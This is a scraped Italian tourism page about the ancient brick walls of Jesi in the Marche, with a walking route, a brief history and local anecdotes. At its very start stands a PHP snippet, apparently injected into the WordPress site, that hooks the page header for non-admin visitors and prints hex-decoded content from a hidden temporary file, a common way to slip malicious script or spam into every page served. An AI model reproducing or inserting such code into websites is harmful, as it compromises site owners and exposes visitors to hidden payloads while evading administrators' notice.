if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Le mura cittadine - Jesi Città da Vivere

Jesi scoperta pura: LE ANTICHE MURA

Inizia la tua passeggiata

Segui il tragitto su Google Maps che abbiamo preparato per farti scoprire i luoghi più suggestivi delle antiche mura. Scegli le tappe da visitare e clicca sull’icona per accedere a curiosità, aneddoti e informazioni storiche.

Breve storia delle mura

Un chilometro e mezzo di mattoni di laterizio rosso che abbraccia e preserva la storia e la cultura della città di Jesi.
Una delle cinte murarie meglio conservate nelle Marche, quella di Jesi, offre scorci e panorami unici sulla città e sul territorio che la circonda.
Le prime fortificazioni di epoca romana vennero modernizzate e ampliate alla fine del ‘400 dall’architetto militare Baccio Pontelli attraverso il rafforzamento di molti tratti e l’edificazione di torri di guardia e di torrioni. Il ruolo difensivo della città rimase fino al XVII secolo dove si iniziò ad edificare abitazioni a ridosso delle mura assumendo in alcuni tratti sembianze simili alle attuali.

Curiosità

É qui infatti, in particolare sul torrione delle Carcerette, che sono sbocciati i primi amori e i primi baci di generazioni di jesini.
É alle mura di Jesi che molti penseranno, ricordando le passeggiate romantiche, tra gli scorci dei vicoli del centro che, silenziosi, continuano a custodire gioie e pene d’amore dei giovani jesini.

Partner